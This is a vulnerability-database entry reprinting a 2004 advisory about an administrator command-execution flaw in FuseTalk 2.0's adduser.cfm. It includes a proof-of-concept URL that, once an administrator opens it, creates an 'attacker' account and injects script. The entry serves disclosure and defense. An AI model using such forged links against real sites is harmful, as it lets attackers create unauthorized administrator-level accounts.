Lucene search
K

E-Zone Media FuzeTalk 2.0 - AddUser.cfm Administrator Command Execution

🗓️ 05 May 2004 00:00:00Reported by Stuart JamiesonType 
exploitpack
 exploitpack
👁 11 Views

FuseTalk 2.0 has an administrator command execution issue in adduser.cfm allowing remote attacks.

Code
source: https://www.securityfocus.com/bid/10276/info

It has been reported that FuseTalk is affected by an administrator command execution vulnerability in the adduser.cfm script. This issue is due to a failure of the application to properly validate the origin of user supplied data.

This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed by a forum administrator, the attacker supplied command would be carried out with the viewer's privileges. This would occur in the security context of the affected web site and may allow creation of arbitrary users, and other attacks.

http://www.example.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&[email protected]&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2004 00:00Current
0.7Low risk
Vulners AI Score0.7
11